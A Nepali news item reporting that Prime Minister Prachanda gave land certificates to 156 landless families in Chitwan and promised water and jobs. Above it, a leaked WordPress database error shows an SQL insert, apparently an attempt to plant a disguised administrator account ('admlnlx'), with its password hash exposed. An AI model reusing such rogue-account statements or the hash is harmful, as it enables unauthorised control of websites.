WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxEkICUceg5wde26TD6IdISWa.QQY8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:57:34', '', 'admlnlx', 'admlnlx')
चितवन,माघ २६-
सरकारले चितवनको मंगलपुरमा १५६ सुकुम्बासी परिवारलाई लालपूर्जा वितरण गरेको छ । प्रधानमन्त्री एवम् माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ले बुधबार चितवनका सुकुम्बासी परिवारलाई लालपूर्जा वितरण गरेका हुन् ।लालपूर्जा वितरण गर्दैमा समस्या समाधान नहुने भन्दै उनले खानेपानी र रोजगारीको व्यवस्था पनि गर्ने आश्वासन दिए ।
सुकुम्बासी समस्या संवेदनशील समस्या हो भन्दै उनले केही दिनभित्रै सरकारबाट दिगो र स्थायी समाधानका लागि आवश्यक निर्णय गर्ने प्रतिवद्धता समेत जनाए ।‘मैले दोस्रोपटक प्रधानमन्त्रीको पदभार ग्रहण गर्नुभन्दा अघि ठाउँ-ठाउँबाट सुकुम्बासी उठाउने काम सुरु भएको थियो । म प्रधानमन्त्री भएपछि गरेको पहिलो काम वैकल्पिक व्यवस्था नभएसम्म सुकुम्बासीलाई उठाउन बन्द गर्ने भनेर पूर्वदेखि पश्चिमसम्म रोकेको छु,’ उनले भने ।
धेरै लामो संघर्षपछि लालपूर्जा वितरण गर्न पाउँदा खुसी लागेको उनले बताए । तर समस्याको समाधान अझै नभइसकेको भन्दै उनले रोजगारीको र खानेपानीको समस्या पनि समाधान गर्ने बचन दिए ।